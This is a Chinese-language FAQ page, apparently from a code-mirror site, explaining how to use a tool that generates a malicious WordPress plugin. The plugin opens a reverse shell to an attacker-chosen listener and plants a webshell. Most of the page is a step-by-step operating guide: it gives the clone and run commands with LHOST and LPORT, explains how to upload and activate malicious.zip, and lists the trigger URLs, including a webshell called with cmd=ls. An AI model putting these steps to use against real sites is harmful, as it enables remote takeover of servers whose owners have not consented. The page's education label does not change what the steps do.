常见问题解决方案：恶意WordPress插件项目

常见问题解决方案：恶意WordPress插件项目

malicious-wordpress-plugin Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload. 项目地址: https://gitcode.com/gh_mirrors/ma/malicious-wordpress-plugin

项目基础介绍

本项目是一个开源的恶意WordPress插件，它能够生成一个WordPress插件，一旦上传，将会提供一个反向shell和一个webshell。该项目主要用于安全测试和教育目的，帮助开发者了解如何保护自己的WordPress网站不受此类攻击。项目主要使用Python编程语言编写，依赖于Kali Linux环境，使用msfvenom生成payload。

编程语言

• Python

新手常见问题与解决步骤

问题一：如何安装并运行项目

问题描述：新手可能不清楚如何安装和运行这个项目。

解决步骤：

1. 确保已经安装了Python环境。
2. 克隆项目到本地：git clone https://github.com/wetw0rk/malicious-wordpress-plugin.git
3. 进入项目目录：cd malicious-wordpress-plugin
4. 运行脚本：python wordpwn.py [LHOST] [LPORT] [HANDLER]，其中[LHOST]是监听地址，[LPORT]是监听端口，[HANDLER]是是否启动handler（推荐启动）。

问题二：如何上传和激活插件

问题描述：新手可能不知道如何将生成的插件上传到WordPress网站并激活。

解决步骤：

1. 运行脚本后，会在当前目录生成一个名为malicious.zip的文件。
2. 登录到WordPress网站的管理后台。
3. 导航到“插件”->“添加新插件”，选择“上传插件”。
4. 选择malicious.zip文件并上传。
5. 上传完毕后，点击“现在安装”和“激活插件”。

问题三：如何访问webshell和reverse shell

问题描述：新手可能不清楚如何访问上传后插件提供的webshell和reverse shell。

解决步骤：

1. 确保监听器（listener）已经在运行，如果脚本中没有启动handler，则需要手动启动。
2. 访问以下URL之一以启动reverse shell或webshell：
   • http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php
   • http://(target)/wp-content/plugins/malicious/QwertyRocks.php
   • http://(target)/wp-content/plugins/malicious/SWebTheme.php?cmd=ls（列出目录内容的webshell）
3. 根据提示操作，即可使用shell。

malicious-wordpress-plugin Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload. 项目地址: https://gitcode.com/gh_mirrors/ma/malicious-wordpress-plugin